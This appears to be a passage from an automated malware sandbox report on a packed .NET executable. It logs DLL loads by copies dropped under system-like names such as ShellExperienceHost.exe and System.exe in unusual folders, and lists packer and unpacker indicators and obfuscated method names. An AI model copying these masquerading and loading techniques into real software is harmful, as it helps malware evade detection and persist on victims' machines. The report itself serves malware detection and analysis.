Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: sspicli.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rsaenh.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Section loaded: sspicli.dll
Source: C:\Recovery\System.exe	Section loaded: mscoree.dll
Source: C:\Recovery\System.exe	Section loaded: apphelp.dll
Source: C:\Recovery\System.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe	Section loaded: version.dll
Source: C:\Recovery\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe	Section loaded: wldp.dll
Source: C:\Recovery\System.exe	Section loaded: profapi.dll
Source: C:\Recovery\System.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe	Section loaded: sspicli.dll
Source: C:\Recovery\System.exe	Section loaded: mscoree.dll
Source: C:\Recovery\System.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe	Section loaded: version.dll
Source: C:\Recovery\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe	Section loaded: wldp.dll
Source: C:\Recovery\System.exe	Section loaded: profapi.dll
Source: C:\Recovery\System.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Section loaded: sspicli.dll
Source: C:\Recovery\System.exe	Section loaded: mscoree.dll
Source: C:\Recovery\System.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe	Section loaded: version.dll
Source: C:\Recovery\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe	Section loaded: wldp.dll
Source: C:\Recovery\System.exe	Section loaded: profapi.dll
Source: C:\Recovery\System.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: 4KjLUaW30K.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4KjLUaW30K.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 4KjLUaW30K.exe

Static file information: File size 1444352 > 1048576

Source: 4KjLUaW30K.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15d000

Source: 4KjLUaW30K.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs	.Net Code: qNlO1J0F0B System.AppDomain.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs	.Net Code: qNlO1J0F0B System.Reflection.Assembly.Load(byte[])
Source: 4KjLUaW30K.exe, yB1t4PNxmGUAD4XHP1t.cs	.Net Code: qNlO1J0F0B

Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 22_2_00007FF848F1DFD3 push edi; retf	22_2_00007FF848F1DFD6
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Code function: 27_2_00007FF848F400BD pushad ; iretd	27_2_00007FF848F400C1
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 29_2_00007FF848F3DFD3 push edi; retf	29_2_00007FF848F3DFD6
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 30_2_00007FF848F2DFD3 push edi; retf	30_2_00007FF848F2DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 31_2_00007FF848F4DFD3 push edi; retf	31_2_00007FF848F4DFD6
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 31_2_00007FF848F400BD pushad ; iretd	31_2_00007FF848F400C1
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 32_2_00007FF848F3DFD3 push edi; retf	32_2_00007FF848F3DFD6
Source: C:\Recovery\System.exe	Code function: 33_2_00007FF848F1DFD3 push edi; retf	33_2_00007FF848F1DFD6
Source: C:\Recovery\System.exe	Code function: 34_2_00007FF848F1DFD3 push edi; retf	34_2_00007FF848F1DFD6
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F0DFD3 push edi; retf	37_2_00007FF848F0DFD6
Source: C:\Recovery\System.exe	Code function: 38_2_00007FF848F2DFD3 push edi; retf	38_2_00007FF848F2DFD6

Source: 4KjLUaW30K.exe	Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr	Static PE information: section name: .text entropy: 7.185003266418592
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr	Static PE information: section name: .text entropy: 7.185003266418592
Source: ShellExperienceHost.exe.0.dr	Static PE information: section name: .text entropy: 7.185003266418592
Source: dllhost.exe.0.dr	Static PE information: section name: .text entropy: 7.185003266418592

Source: 4KjLUaW30K.exe, RdFx8MhwHpIAqTDYA0b.cs	High entropy of concatenated method names: 's6hEYjr3KF', 'xtoEARS230', 'xR5ED9lf8y', 'OY8EpoCMg6', 'R1S8IQX2743AD59twGm', 'RkUe4uXIOO2ZObmsKrs', 'QmbaBDXUw4g8967vNql', 'JyFA64XqAuaw9fxJIGc', 'WQ0JaiX388YDRhMxKpr', 'IyT5sUXxMkP1hxBh3dd'
Source: 4KjLUaW30K.exe, pssBONvokLUj0rPrGVt.cs	High entropy of concatenated method names: 'KhuIUeyvPV', 'qpAWNFQMTNVMlCJxhHE', 'OKMk4dQSpnwo72GtuAv', 'NOXMFRQsaH8KVZUYqft', 'DS3YBqQiIVkGymTvOI7', 'Tg0V5lCapQ', 'ytjVfLPMRZ', 'zBFV7ipDGv', 'rsbVt7DWx2', 'UAjVjReXSq'
Source: 4KjLUaW30K.exe, csVbO1bXkGVq46Zd3v.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'MRKPVjJD7tIAgUraewD', 'h1maHZJAp7vetARPU0g', 'RRtQX1JZ3IyRWXP0gj6', 'uOE0eaJpg6IkdLkDQ6t', 'WknsxLJY5mLcTCVNmsB', 'sa0iqmJjbrBkEfb0V40'
Source: 4KjLUaW30K.exe, zRjdRcY0uBStDt7cu06.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'kjV1L2d6nwpZN2gKpRe', 'LIvUBUdB61AO7X8DWVl', 'qCbhFRdCiQMIBlWqSjd', 'aqkTvldF7uafyLO15hB', 'lQfB7TdO66ckhYMBJrn', 's93fhJdzIjpIJJb3L14'
Source: 4KjLUaW30K.exe, jXbpxlNym9gDouik4Mu.cs	High entropy of concatenated method names: 'hGpnJhNB6F', 'TOgnLTqxfJ', 'MfHnCfMuft', 'W2FnBPNH82', 'SrenoTYt2Y', 'R71jg9atrhFRAF4PcZD', 'VL0xE6awLSB9AX6LQeg', 'ePgAPbjOvHA4W4tAFNa', 'zbPCMojz2ffkcKtGyaT', 'DrqMXracC3Bc9gOe36n'
Source: 4KjLUaW30K.exe, EYxmENNgMAgigIOyy5j.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'JahHjGZEdX', 'BRxHFSLv6P', 'C5xH28FjEA', 'HF1HRJ4WqB', 'iecHhjReok', 'ArmrUcifIShYjtDNidP', 'h2Ju90ig515xauXeLux', 'vkaoKXiuSp40XcIyYBC'
Source: 4KjLUaW30K.exe, t1FOf5u5vSxA9rNE92.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'oV0G4hJiXbUioC6AaBj', 'VysoBpJMbeJTyMkJe2b', 'dvCi8bJSBhPaPf0PCt4', 'xq3A4oJefoyNaRbDIsQ', 'GM74WSJXl3Hhfj1B2uv', 'zJU4nCJWgJxiJnYjlli'
Source: 4KjLUaW30K.exe, UoSFo1hu4DGVNe1MMSI.cs	High entropy of concatenated method names: '_5u9', 'NEU7niFAuN', 'UGZV6JvKrq', 'Jhh7H1kqwK', 'pypW4ikCD1OtijrH5cm', 'Op0iZskFZ8YG8AcIR1X', 'n0DD4ZkO4MlIYoBSsFr', 'GgNmfDk6PokSxiKouCh', 'bSCVASkBaqqEkZr0FKi', 'ya1i2SkzDNtkUQhjARl'
Source: 4KjLUaW30K.exe, q9i24FYAk4joCprBGEq.cs	High entropy of concatenated method names: 'TA7mavaTcS', 'MNnRkuAdCJbjwIj8bLg', 'GbNdL2AuyTYNGQhEVIW', 'MkGjb7AJmhGZc1YsxJR', 'R6MkXNATrKDlhaDG9ST', 'xVt9ZwA4qBCCto35HuT', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs	High entropy of concatenated method names: 'gmNG9PymMnmFGkUZHJF', 'hymh89yrHeBMAb3sclK', 'jflbevyGlC2hRs3LytW', 'XuWAiFyQF2Wk5evRrI7', 'CbAf12eDK4', 'halXaMyHYJV6fsDjCjr', 'QqTKBky7p1m3yCWmsq7', 'tAVBpnyqqWigHDOrbHv', 'li7F3qy3QB5NKTItwHZ', 'eXhbbAy2PAUcXSCX8DG'
Source: 4KjLUaW30K.exe, iVQJa2oxSIa1fZwxjyW.cs	High entropy of concatenated method names: 'imuolNufV2', 'JsuoJlH6j6', 'YqAL9dU03ppiJR8RkgC', 'IAZvXZU64ghP5nHrA4D', 'ACfcZnUBXeLQLUl2LGP', 'EUvBKCUCmy3kQclFBNw', 'vqKjmcUFCjo6WkshEeM', 'Kwovn8UOGqNoAL3ti0B', 'ODwtAGUz5j00bBNvyFV', 'xYbwITxtlilNr6T5Eru'
Source: 4KjLUaW30K.exe, sXO9vehYHvkDjwvGIbG.cs	High entropy of concatenated method names: 'zep4kVisfq', 'SSL45KGvgV', 'eNp4foYpfA', 'wiE47lj0ql', 'QQVXMdMz6WwAvIMTnrO', 'lpLAGYMFOff0oR64PWv', 'tviTYKMOtCVyOxwEs6i', 'fKicVWStiCQo07KuEVa', 'mrIxr7SwVssxNG3l6ym', 'mlTi3xSceqVMKqDNgUH'
Source: 4KjLUaW30K.exe, uLcP3aYciqMSyYeGRgx.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fqx2J74IVaFG1bBou0R', 'UTmIPB4Uuayfd6pL5fu', 'eteWqi4xhi8MAmQdp5O', 'r5u3CQ4LloCdGAXI2Zu', 'cuuGK74oNiD686rYj0K', 'vyg1T34EMRVUN8QVYJy'
Source: 4KjLUaW30K.exe, mvgFL5Y6b0QUuoeLoPK.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jKokbJDX0dio5ZHLco3', 'ayT4q6DWo0kL6dteHUP', 'TgjdmDDkLcCH5mh4RGk', 'DCePQaDbkQHuWXb4bR7', 'eVyhfCDGlbw5cvhQBLF', 'dbyG9pDQ2dSYhng056V'
Source: 4KjLUaW30K.exe, YorUUdVOrRKdGCl9Uta.cs	High entropy of concatenated method names: 'pU1Plsm8fR', 'VpmPJMcbdV', 'OKuPLNXJIU', 'dvfPCnDpiN', 'OsSPB5Ko3N', 'tHVutEECoMuPOfBJkIZ', 'rvTSs0EFTYC9kw012pB', 'j7OnaUEOSW0y5fNCCGb', 'EA4JfvEz9vHmkcdXb97', 'SAfnhDvtSqUexwBSnip'
Source: 4KjLUaW30K.exe, IVQrXTYdhw2b6IuNnmW.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'njXy3buNOAQm0GIfyuA', 'XjEL5Gu0QuuIoWa3G8v', 'UUBHJ8u6l3HIcE2SJ5I', 'JOUwOtuB5gRnsQt0PKA', 'WAZslZuCr8RiyxDDVf1', 'uw6UgKuFy3sQ93Xrxbp'
Source: 4KjLUaW30K.exe, wx5AJ09t2ek3FMHXjn.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'OY31nSTjxGuJPHaVgsE', 'uRfrpUTaV5A5oZ4Jmmk', 'HGNgpBTs3bDZLnUltx1', 'CX5Mf7TiZ8857rHPeqC', 'ehI9bWTMmAlJvvBLh0j', 'ijHEOXTSpK208TuIRcH'
Source: 4KjLUaW30K.exe, b1bLN1hdsT4GQl0AsQ6.cs	High entropy of concatenated method names: 'p10Eg1rJQS', 'tJkEqdfdxG', 'e2lEXHGdPM', 'oOR32vXy7Vf8OPoseDD', 'OegrjLXRaWPEBF1WV8t', 'cDK7VrX5Cd0gvRvHdOP', 'Jw95B1XlEoSTDSPGwex', 'RQCCOeXPIVXAOJxaYgH', 'qsmTpUXnCG5k4y2eH57', 'G3j2qkXNDEWgrVabLc6'
Source: 4KjLUaW30K.exe, aaHxfKot3wBhAtbghOZ.cs	High entropy of concatenated method names: 'rRZoh0N8cd', 'hAKouWOWH3', 'c5Po9NfTpx', 'WHWoxEhxDl', 'Af7oYPlEs5', 'GkBkvGx1ilbiPh6Za2E', 'kBiwM3xmugAUuptZVwT', 'Uj8T3axrUk7iBPjwQ9u', 'QXREoSx95SQOWLfIhgT', 'j9SWKDxHEC0XAsiBopW'
Source: 4KjLUaW30K.exe, LvpXsezbnH0kVtox77.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'PrVY0HdKNrZHKtBBZRv', 'VcxrBDdJG8U7fmWfaP3', 'Kprfl5dTtk0eii8aFcZ', 'rOPm1Edd9DrgxjY9qte', 'NvXo7tduF94uvs3oXKO', 'F5t46Qd4NZMb87h32DV'
Source: 4KjLUaW30K.exe, kaFj5ehAhn7SApeLRJ6.cs	High entropy of concatenated method names: 'Cmg8nxGxDeNA5gtByZk', 'zrXo8uGLueKRehjBFs8', 'xFvrGXGIkGmEmIdF9bg', 'm5yE4wGU2QsN82pxobq', 'IWF', 'j72', 'aAoVUJsid1', 'JSlVMPcEMQ', 'j4z', 'BbMVGQhrb2'
Source: 4KjLUaW30K.exe, WrALtDVt1SeisN1My3e.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 4KjLUaW30K.exe, gbwyYgv3ti61ctQdP1F.cs	High entropy of concatenated method names: 'jwU1iyyeWU', 'Ecb1jgIZir', 'wj01Fn0kf1', 'gRk121SBxq', 'HD51RHXiry', 'jRV1hqnWed', 'FMh1urlpUg', 'IOt191h7kF', 'TRA1x14iKK', 'bxa1YkvaF5'
Source: 4KjLUaW30K.exe, f2VANrYn2uMOLmfKVWn.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'Ocyg68fUPlO6yC0bKZu', 'ngC4agfxdRNQ1XEG04b', 'iowKKXfLSlS3CZybEiZ', 'lGCJyAfojgQMJmVMxvN', 'QmtckBfEnZ3jB5lssPa', 'AZfBFefvtxkNh27qTgf'
Source: 4KjLUaW30K.exe, WNWwPKYOQJBxvHSPw4u.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'CZxHBY4Gbap1FN1Nlia', 'CyqZHF4QQBoO93GUYQ9', 'M9URAJ4mPcVOC6ssqJI', 'y6kWF94r7NTKgiRTIRG', 'ErekOM414qAISmKZG8E', 'G5Dl2k49TnBvv65jtPG'
Source: 4KjLUaW30K.exe, SiFU3k08VVtuEJmLFC3.cs	High entropy of concatenated method names: 'hbVieLDDgps8g', 'cu1wMYyjuQC4SUcDc53', 'Kn65TLya3mpm34nWRea', 'mWV9e3ys8XVgdXL7coJ', 'NSj3wLyinCS73QCTwsv', 'dG5yMiyMRqJeMuCuMGq', 'hh7j1nypsxud7PVOXxc', 'EkCBJ8yYHtIreOHbXZm', 'xKv2MgySm0bGtLFfDbA', 'heXqWfye7Sp6gq9ApoJ'
Source: 4KjLUaW30K.exe, kIcqdXYoQ1J3IyjUpbB.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'lMcAJydyV7OwKeIqtrU', 'lnxPpjdRTjp1tP0PyEw', 'J2ALYid52O13p5HjTSY', 'b8woPMdlgSFnM3uYOXE', 'L4aibndPhkRkvssXrN9', 'HrXTLcdnRk4ECFYd1Pn'
Source: 4KjLUaW30K.exe, skUQt8oHJIg7GoYYbNA.cs	High entropy of concatenated method names: 'vMKdnFEJx2', 'zJfdH4PuR6', 'kjFdQydwAo', 'xWjd4l4Kaw', 'wYSdElwWFv', 'wGgdrath5X', 'csrdVU7GI4', 'kdld3hwK6D', 'vmYdIG14mV', 'qSed0S482R'
Source: 4KjLUaW30K.exe, GZkZi6N25CU3ZM39Yj8.cs	High entropy of concatenated method names: 'nx1mdWHWIW', 'Tk9mPwAvKc', 'mOJmKG8ZPq', 'nW54rVA31nZArZCoIeK', 'hljH01A2eVyNNZfBRtn', 'qoVHpkAIlrDQcMnG3tp', 'vaobcqAU4k4CbCPI62F', 'al5VQeAxlZa01H0MclA', 'aWrR4dALinSd85KKN5K', 'uREEBiA7VWoqMnMmLHF'
Source: 4KjLUaW30K.exe, NomT1BvPedyJf7edpoP.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 4KjLUaW30K.exe, jp8wrGYwREVGwsYMwhU.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'KwUTnbuoR4PGldwNALP', 'xxyP1NuEX0e95w2kSsK', 'vXH0hbuvbTjbAtWLEi8', 'iPocpUuVN1Hh3GEQce5', 'Hjw815u8xhj8q0ARU5D', 'I5cdavuhhUSVhObBTjO'
Source: 4KjLUaW30K.exe, sW4CwMvqMV4gjqDPAwt.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'EYp18egKX6', 'FX61crElb0', 'r8j', 'LS1', '_55S'
Source: 4KjLUaW30K.exe, U4V5YBYGovk0uMqoHJ7.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'VmZCwturZ0DAFBp31sy', 'RrWjpCu1YEZwB2w0iXH', 'AjqGfnu9xBTDfv8J9hG', 'NgmsP5uHIkD3R1eDC2X', 'tt6XSVu7ltV9PL3Zd1y', 'rZUO0Iuq1bxSDjtu5Yl'
Source: 4KjLUaW30K.exe, cZbENoh1wJqlr2AhSOG.cs	High entropy of concatenated method names: 'KV8EtkDUGY', 'uDoEja6DTq', 'lyCEFQy7a3', 'zWByHlXYn3hcuemFsyO', 'CQUcaRXZppVHdTkllT4', 'xiMsUjXpiiVngS2qlvT', 'URbloXXjSPaT31q4idY', 'wpnE86IPUQ', 'S5gEcQHyjQ', 'RHtEUTU0wp'
Source: 4KjLUaW30K.exe, uLQtw4DjCF6t2UxoVc.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'kxlYHrPx9', 'VJpOdacIicGjkiFTiQe', 'EKxtXLcUSAKeYtBQivI', 'vi2p0vcxWnnSmAgUO6F', 'Ohasv7cLgsGUbMZuE5e', 'kpFnAtcogebqDCaQTJM'
Source: 4KjLUaW30K.exe, qGVWVXVcX8NWKRCo2ot.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'z28PoytanZ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 4KjLUaW30K.exe, JTmi7Phv6kx1i2dVJ4u.cs	High entropy of concatenated method names: 'CRn4x2EwsM', 'iNL4Yonrid', 'jTs4A4u3Uj', 'GZH4DfTEXG', 'Gor4p3VsxW', 'TGH4SUdQ2m', 'DE6V4pS9nT1vNhtm3G9', 'qJH8dPSr3rkcF3d3iXH', 'o1ceACS1y79tww8G6vF', 'bPxGBuSHI6juM6e0qgM'
